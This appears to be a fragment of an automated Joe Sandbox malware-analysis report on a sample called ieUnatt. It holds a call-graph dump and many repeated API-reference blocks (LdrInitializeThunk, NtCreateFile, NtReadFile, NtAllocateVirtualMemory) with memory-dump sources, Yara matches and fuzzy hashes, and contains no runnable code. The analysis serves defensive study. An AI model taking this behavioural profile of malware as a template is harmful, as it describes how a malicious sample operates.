86193 29487b0 LdrInitializeThunk 86192->86193 86193->86192 86195 2935d03 86194->86195 86196 2935d24 86195->86196 86226 2948840 86195->86226 86196->86167 86198 2935d47 86198->86196 86199 2948cb0 NtClose 86198->86199 86200 2935dc7 86199->86200 86200->86167 86202 2935e05 86201->86202 86231 2948670 86202->86231 86205 2946880 86206 29468e5 86205->86206 86207 2946918 86206->86207 86236 293fe01 RtlFreeHeap 86206->86236 86207->86172 86209 29468fa 86209->86172 86211 293f01c 86210->86211 86212 2933f70 LdrLoadDll 86211->86212 86214 293f03a 86212->86214 86213 293f043 86213->86177 86214->86213 86215 2933f70 LdrLoadDll 86214->86215 86216 293f10e 86215->86216 86217 2933f70 LdrLoadDll 86216->86217 86218 293f168 86216->86218 86217->86218 86218->86177 86220 293ef55 86219->86220 86221 293efeb CoUninitialize 86220->86221 86221->86186 86223 29487cd 86222->86223 86237 4842ba0 LdrInitializeThunk 86223->86237 86224 29487fa 86224->86192 86227 294885d 86226->86227 86230 4842ca0 LdrInitializeThunk 86227->86230 86228 2948886 86228->86198 86230->86228 86232 294868a 86231->86232 86235 4842c60 LdrInitializeThunk 86232->86235 86233 2935e79 86233->86170 86233->86205 86235->86233 86236->86209 86237->86224 86238 29367a0 86239 29367ca 86238->86239 86242 2937940 86239->86242 86241 29367ee 86243 293795d 86242->86243 86249 2948450 86243->86249 86245 29379ad 86246 29379b4 86245->86246 86254 2948530 86245->86254 86246->86241 86248 29379dd 86248->86241 86250 29484e8 86249->86250 86252 2948478 86249->86252 86259 4842f30 LdrInitializeThunk 86250->86259 86251 294851e 86251->86245 86252->86245 86255 29485e1 86254->86255 86256 294855f 86254->86256 86260 4842d10 LdrInitializeThunk 86255->86260 86256->86248 86257 2948623 86257->86248 86259->86251 86260->86257 86261 293fb20 86262 293fb36 86261->86262 86263 2933f70 LdrLoadDll 86262->86263 86264 293fb5b 86263->86264 86265 2946880 RtlFreeHeap 86264->86265 86266 293fce8 86264->86266 86265->86266 86267 2947ca0 86268 2947cbd 86267->86268 86269 2947ccb RtlDosPathNameToNtPathName_U 86268->86269 86270 2938227 86272 293822a 86270->86272 86271 29381e1 86272->86271 86274 29369b0 LdrInitializeThunk LdrInitializeThunk 86272->86274 86274->86271 86275 29321a7 86276 29321e5 86275->86276 86277 2935cd0 2 API calls 86276->86277 86278 29321f0 86277->86278 86279 2948320 86280 294833a 86279->86280 86283 4842df0 LdrInitializeThunk 86280->86283 86281 294835f 86283->86281 86447 29414e0 86452 29414f9 86447->86452 86448 2941589 86449 2941544 86450 294ace0 RtlFreeHeap 86449->86450 86451 2941554 86450->86451 86452->86448 86452->86449 86453 2941584 86452->86453 86454 294ace0 RtlFreeHeap 86453->86454 86454->86448 86284 2940ca3 86285 2940ca9 86284->86285 86297 2948b20 86285->86297 86287 2940d12 86288 2940d45 86287->86288 86289 2940d30 86287->86289 86291 2948cb0 NtClose 86288->86291 86290 2948cb0 NtClose 86289->86290 86292 2940d39 86290->86292 86294 2940d4e 86291->86294 86293 2940d85 86294->86293 86295 294ace0 RtlFreeHeap 86294->86295 86296 2940d79 86295->86296 86298 2948bc7 86297->86298 86300 2948b4b 86297->86300 86299 2948bda NtReadFile 86298->86299 86299->86287 86300->86287 86456 2941469 86457 2941492 86456->86457 86458 294146f 86456->86458 86460 2948cb0 NtClose 86457->86460 86458->86457 86459 2941474 86458->86459 86464 2945370 86459->86464 86461 2941499 86460->86461 86463 2941488 86465 29453d5 86464->86465 86466 294540c 86465->86466 86469 2940ba0 86465->86469 86466->86463 86468 29453ee 86468->86463 86470 2940b3f 86469->86470 86470->86469 86471 294ac60 NtAllocateVirtualMemory 86470->86471 86472 2940c88 86470->86472 86473 2940b51 86471->86473 86473->86468
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 0293C0AF
                                                                                                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0293C0EE
                                                                                                                                                          • FindClose.KERNELBASE(?), ref: 0293C0F9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3541575487-0
                                                                                                                                                          • Opcode ID: a5e54aa4d2f82ac75b3b5f61746cbb78e13766490a4d6b0bb337a396b9723b99
                                                                                                                                                          • Instruction ID: ad64577ae9b8f476e4b7ec46759ab854488caece3c3570a5e2a9169d8c766a44
                                                                                                                                                          • Opcode Fuzzy Hash: a5e54aa4d2f82ac75b3b5f61746cbb78e13766490a4d6b0bb337a396b9723b99
                                                                                                                                                          • Instruction Fuzzy Hash: 71316E71900748BBDB21EF64CC85FEB77BDEF84749F144459F908A7180DA70AA848BA0
                                                                                                                                                          APIs
                                                                                                                                                          • NtCreateFile.NTDLL(?,06B611D6,?,?,?,?,?,?,?,?,?), ref: 02948AB8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                          • Opcode ID: fd5a625bb81c2337e524eb3fe1b921e1f8728350ddcfbde0e4743b05e1da8857
                                                                                                                                                          • Instruction ID: 91b85357e2443b87b7a4366209b47f7d38b635b24595905bb8f76c6fc582d68b
                                                                                                                                                          • Opcode Fuzzy Hash: fd5a625bb81c2337e524eb3fe1b921e1f8728350ddcfbde0e4743b05e1da8857
                                                                                                                                                          • Instruction Fuzzy Hash: 3431A1B5A01248ABDB14DF99D881EEFB7B9AF8C310F108209F919A7244D774A951CFA4
                                                                                                                                                          APIs
                                                                                                                                                          • NtReadFile.NTDLL(?,06B611D6,?,?,?,?,?,?,?), ref: 02948C03
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                          • Opcode ID: 3d104744ebe8acaf9ec54abf90b14a3cc78ff5fc03015d6e3da3df82d4ade34f
                                                                                                                                                          • Instruction ID: d8f42fe8812e73913bd7f400aa957c6fa5a1824341610a45b692f6d098fc9130
                                                                                                                                                          • Opcode Fuzzy Hash: 3d104744ebe8acaf9ec54abf90b14a3cc78ff5fc03015d6e3da3df82d4ade34f
                                                                                                                                                          • Instruction Fuzzy Hash: 1631D2B5A00248AFDB04DF99D881EEFB7B9AF88314F008209F918A7244D774A811CFA4
                                                                                                                                                          APIs
                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(029317FB,06B611D6,0294798F,00000000,00000004,00003000,?,?,?,?,?,0294798F,029317FB), ref: 02948EC2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2167126740-0
                                                                                                                                                          • Opcode ID: 5c9e9ee626a7e7b8b0c6e6f768739af3bc718c6d600b74d334166e7a47a84f3b
                                                                                                                                                          • Instruction ID: cd6280420304cb56f0ba5dc9b83c34d216479e8d3a17a2994c7debe5fd776f47
                                                                                                                                                          • Opcode Fuzzy Hash: 5c9e9ee626a7e7b8b0c6e6f768739af3bc718c6d600b74d334166e7a47a84f3b
                                                                                                                                                          • Instruction Fuzzy Hash: 1E212BB5A00249ABDB10DF98DC41EEFB7BAEF88300F008509FD1897240D774A951CFA5
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DeleteFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4033686569-0
                                                                                                                                                          • Opcode ID: 8fa01f27c7d2a94d8e64adcdf6cbce2e7d4e070d4c0a26991eac1d178eb85420
                                                                                                                                                          • Instruction ID: 7c6923bf340754148d38de65131297ba0a0505c95c670bee27bf69affc08e428
                                                                                                                                                          • Opcode Fuzzy Hash: 8fa01f27c7d2a94d8e64adcdf6cbce2e7d4e070d4c0a26991eac1d178eb85420
                                                                                                                                                          • Instruction Fuzzy Hash: A7115E719012196AE620EAA9DC41FEFB7ADEFC9714F008109F918AB280DBB47515CBE5
                                                                                                                                                          APIs
                                                                                                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02948CE4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                          • Opcode ID: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                                                                                                                          • Instruction ID: c6a60d3feaf50314c08417dd00e7678d26cf77b05b0ba14df86d895783e4597e
                                                                                                                                                          • Opcode Fuzzy Hash: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                                                                                                                          • Instruction Fuzzy Hash: F3E08C322003147BD620EA9AEC40FABBB6DDFC5B24F008015FA0CA7241C7B5BA148BF4
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 7494f626e02c0e05c951a62e54446d1982029a61e28c76e6bfb9b8f85ce496dc
                                                                                                                                                          • Instruction ID: 796020a99266b74f86a8540a811c86645f3ea1ec36ffbb374d42e818332ff2a3
                                                                                                                                                          • Opcode Fuzzy Hash: 7494f626e02c0e05c951a62e54446d1982029a61e28c76e6bfb9b8f85ce496dc
                                                                                                                                                          • Instruction Fuzzy Hash: F390023160550406F1017158451470614058BD0205F65C912B542D569D8795DAA569A3
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 53bde6128cc4e5cc5f3baabdef2dbf61e76e2ae286635c09d654a3f9d13c061d
                                                                                                                                                          • Instruction ID: b3018d12821cac8d707473c9da283f5c6fc285ba2ebcedd65d51d07a16bc1b3c
                                                                                                                                                          • Opcode Fuzzy Hash: 53bde6128cc4e5cc5f3baabdef2dbf61e76e2ae286635c09d654a3f9d13c061d
                                                                                                                                                          • Instruction Fuzzy Hash: 169002616015004661417158480440664059BE1305395C616B555D561C8618D9A9966A
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: f492675c9941414358f54597cb3d7d22b7ee2d3872f319cc5fe5aff12dc72417
                                                                                                                                                          • Instruction ID: ae73b8c64d82d53d246928e2fcc6ae215d26f51de6f11aef6630c1858d5ceada
                                                                                                                                                          • Opcode Fuzzy Hash: f492675c9941414358f54597cb3d7d22b7ee2d3872f319cc5fe5aff12dc72417
                                                                                                                                                          • Instruction Fuzzy Hash: 9390023160580016B1417158488454644059BE0305B55C512F542D555C8A14DAAA5762
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: c10997c0876e77f6475f1e327a69c8469193ac93c93a78d8157a21ba630bad75
                                                                                                                                                          • Instruction ID: 1574cb998370b9fe807c50d82fc5f4572ccc6d6ed29bb27df851ca411315bbff
                                                                                                                                                          • Opcode Fuzzy Hash: c10997c0876e77f6475f1e327a69c8469193ac93c93a78d8157a21ba630bad75
                                                                                                                                                          • Instruction Fuzzy Hash: 2690023120140406F1017598540864604058BE0305F55D512BA02D556EC665D9E56532
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 617eb1c3c87c6da446c77f8f24dc51094086d434314c61ec2777e1060040f8c8
                                                                                                                                                          • Instruction ID: a377016946278dad897768e17c4160d2a67732c6e298a3c95d7e8fc414546de0
                                                                                                                                                          • Opcode Fuzzy Hash: 617eb1c3c87c6da446c77f8f24dc51094086d434314c61ec2777e1060040f8c8
                                                                                                                                                          • Instruction Fuzzy Hash: B990023120140846F10171584404B4604058BE0305F55C517B512D655D8615D9A57922
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 04995b9eba18fd00aa137b891e4723df5b7dbe519b61e940321dd6793ffb70d6
                                                                                                                                                          • Instruction ID: 558a2ea6b6db1dc0a38c5617afecd841c15a929f47bf2b261347af545adcc2f0
                                                                                                                                                          • Opcode Fuzzy Hash: 04995b9eba18fd00aa137b891e4723df5b7dbe519b61e940321dd6793ffb70d6
                                                                                                                                                          • Instruction Fuzzy Hash: 9F90023120148806F1117158840474A04058BD0305F59C912B942D659D8695D9E57522
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 7b836b50f87e41cb321b97bfc0bc181e2d716a57bb5afcb190ce2a07a8913048
                                                                                                                                                          • Instruction ID: c876e9ed91e62e6bc12c17e3b159e33fd5302267c20b9b1a85694abf3ef1e309
                                                                                                                                                          • Opcode Fuzzy Hash: 7b836b50f87e41cb321b97bfc0bc181e2d716a57bb5afcb190ce2a07a8913048
                                                                                                                                                          • Instruction Fuzzy Hash: 97900221242441567546B158440450744069BE0245795C513B641D951C8526E9AADA22
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: bdcd3429ef5fbd351718c438ca1e34c4266bdc87093159cd80318ffb08df0230
                                                                                                                                                          • Instruction ID: ae071c0a10cc1b75bee9d6797ab61eeee55d0f18c337e689752bb28c531a3737
                                                                                                                                                          • Opcode Fuzzy Hash: bdcd3429ef5fbd351718c438ca1e34c4266bdc87093159cd80318ffb08df0230
                                                                                                                                                          • Instruction Fuzzy Hash: 8390023120140417F1127158450470704098BD0245F95C913B542D559D9656DAA6A522
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 00e4cf7046728179caa159af9721b166d0564de897ff55dc64ab77fb2c223df9
                                                                                                                                                          • Instruction ID: 6f116dd087a771757eccb95e55f7723bf54974ae50b917ed0816bc030414c694
                                                                                                                                                          • Opcode Fuzzy Hash: 00e4cf7046728179caa159af9721b166d0564de897ff55dc64ab77fb2c223df9
                                                                                                                                                          • Instruction Fuzzy Hash: 8190022921340006F1817158540860A04058BD1206F95D916B501E559CC915D9BD5722
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: ce51ed4f9d48354d60e99ac2cd4eb9abc066e9591ab574c0179e9795351ad104
                                                                                                                                                          • Instruction ID: 42f630b65b23355f8c1bfb494d8ce03fd75f9f999e9290a4f9474185d515831d
                                                                                                                                                          • Opcode Fuzzy Hash: ce51ed4f9d48354d60e99ac2cd4eb9abc066e9591ab574c0179e9795351ad104
                                                                                                                                                          • Instruction Fuzzy Hash: 8690022130140007F141715854186064405DBE1305F55D512F541D555CD915D9AA5623
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 85efdc0336b4ac82b914d42d26cbf7960e5253acd2ebf9640a3bc3c14b4d6029
                                                                                                                                                          • Instruction ID: b0a7c547e940e2f49acc58e27abbe3ce6e81d6752284524a4e515687ccc38a80
                                                                                                                                                          • Opcode Fuzzy Hash: 85efdc0336b4ac82b914d42d26cbf7960e5253acd2ebf9640a3bc3c14b4d6029
                                                                                                                                                          • Instruction Fuzzy Hash: 4490022160140506F10271584404616040A8BD0245F95C523B602D556ECA25DAE6A532
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 188f9f2b547e970330b6d15b239f6e69c5fcdea72b4765df5ce3afcabe6be55e
                                                                                                                                                          • Instruction ID: 2bc97d51f53b71ff38e6a81de2c20dacd29f5ec7dcda03a132cfc7c05d1f0d22
                                                                                                                                                          • Opcode Fuzzy Hash: 188f9f2b547e970330b6d15b239f6e69c5fcdea72b4765df5ce3afcabe6be55e
                                                                                                                                                          • Instruction Fuzzy Hash: 1990026120180407F1417558480460704058BD0306F55C512B706D556E8A29DDA56536
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 6fc370a1a19a6b47093d7ef71793369ad7b36181ba0b70865133f04a2d365986
                                                                                                                                                          • Instruction ID: 6af578745f3d45bd7e39896d95b7838e179cd2d2a3e85350995a94b63cfcbcd9
                                                                                                                                                          • Opcode Fuzzy Hash: 6fc370a1a19a6b47093d7ef71793369ad7b36181ba0b70865133f04a2d365986
                                                                                                                                                          • Instruction Fuzzy Hash: 22900221601400466141716888449064405AFE1215755C622B599D551D8559D9B95A66
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
